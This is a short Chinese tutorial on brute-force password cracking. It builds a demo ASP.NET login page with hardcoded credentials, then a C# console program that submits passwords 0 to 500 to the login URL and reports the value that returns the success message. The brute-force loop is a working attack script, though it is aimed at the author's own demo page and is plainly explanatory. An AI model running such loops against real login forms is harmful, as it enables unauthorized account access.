利用穷举密码的破解原理

①.创建一个“被攻击网站”的登录页面：DeFault.aspx

提交按钮的引发事件：

    protected void Button1_Click(object sender, EventArgs e)

    {

        if (TextBox1.Text == "admin" && TextBox2.Text == "123")

        {

           Response.Write("登录成功");

        }

        else

        {

           Response.Write ("登录失败");

        }

    }

 

②.创建一个控制台应用程序：名为“破解DeFault”

static void Main(string[] args)

        {

            WebClient wc = new WebClient(); //创建WebClient类型对象，用于向 URL标识的资源 发送数据。

            wc.Encoding = Encoding.UTF8;

            for (int i = 0; i < 500; i++)  //通过for循环依次从0到500提交密码，当“被攻击”的网页出现“登录成功”的字符串时的 i 值就是正确的密码！

            {

                string s = wc.DownloadString("<资源地址>");  //这里的<资源地址> 是指包含提交信息的URL(可通过IE的bebugbar查取)，其中将密码文本框的Text设置为：TextBox2.Text=“+ i +”。

                if(s.Contains("登录成功"))

                {

                    Console.WriteLine("找到密码了"+i);

                }

            }

                Console.ReadKey();

        }

WebClient类：将数据发送到URI标识的资源及从此资源接收数据的常用方法。

该类的DownloadString(string address)属性：以string形式下载请求的资源、指定要下载的资源。在这里应注意：这方法会先将数据以byte[]形式下载，再根据byte[]猜测数据的编码后再编译成字符串，猜测猜错了就会出现乱码，所以最好手动用相应的Encoding编码。

 

DebugBar是功能强的IE插件,从各个不同的角度剖析Web页面内部的细节层面.
官方下载：http://www.debugbar.com/download.php

③调试“破解DeFault”就可获得